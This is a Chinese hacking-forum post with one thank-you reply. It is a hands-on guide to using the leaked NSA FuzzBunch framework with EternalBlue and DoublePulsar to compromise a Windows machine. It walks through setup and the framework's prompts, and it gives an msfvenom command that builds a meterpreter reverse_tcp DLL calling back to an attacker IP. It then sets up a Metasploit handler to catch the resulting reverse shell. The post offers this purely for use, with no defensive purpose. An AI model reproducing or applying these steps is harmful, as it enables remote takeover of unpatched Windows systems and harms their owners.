搜索
查看: 14747|回复: 1

最新爆出的方程式EQGRP_Lost_in_Translation工具利用方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-4-15 13:29:47 | 显示全部楼层 |阅读模式
  • 下载 python2.6 并安装
  • 下载 pywin32 并安装
  • 将 C:\Python26 添加到环境变量 PATH 中。
  • EQGRP_Lost_in_Translation 下载到的文件解压,找到 \ windows\fb.py,将,下图中两个部分注释掉。

3733988987.png

1256563056.png

然后运行 python fb.py 就可以执行了。

snipaste_20170415_132041.png



NSA 漏洞利用框架视频过程:链接: http://pan.baidu.com/s/1hszHQk8 密码: jqi9 可以用msf生成shellcode,payload那里执行run shellcode就可以反弹。成功反弹截图
0.jpg
拿到exp,测了下
所需环境如下:一,攻击机1(32位系统,py2.6版本,pywin32) 二,攻击机2(linux带msf就好)
windows目录下新建listeningposts目录,空的就好(是exp下的windows目录,不是C盘下的windows目录)
不需要注释文件
执行python fb.py
可看到如下页面
2182820585.jpg
设置攻击IP,如192.168.1.24
设置监听IP,
切记,这里是no,红框位置
2340429280.jpg
接着use eternalblue,一直回车即可,一直到这里,红框位置,根据自己的环境选择,我这边两个都选的1
1338851604.jpg
接着回车,可以看到如下页面
2002122323.jpg
use Doublepulsar,回车注意红框位置,第二个红框,这里选择2,接着输入恶意dll的路径,
808975109.jpg
恶意dll的生成命令如下,在linux中生成,linux需要装好msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > test.dll
IP,端口,输出的名字自己改并把dll文件移植到攻击机1中(顺序有点放反了,不过没事)
如图所示
1229327954.jpg
接着,攻击机1就暂时别动了,去攻击机2,打开msf,命令如下: msfconsole use exploit/multi/handler set LHOST set LPORT exploit, 设置好IP,端口接着开始监听,继续回到攻击机1,回车就好了,可以看到如下页面,就是攻击成功了,返回攻击机2,可以看到已经反弹了shell
2888022156.jpg
3030923560.jpg




过段时间可能会取消签到功能了

0

主题

25

帖子

181

积分

我是新手

Rank: 1

积分
181
发表于 2017-4-15 20:08:07 | 显示全部楼层
我从微信公众号来 今天是我注册的第一天 感谢分享!
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表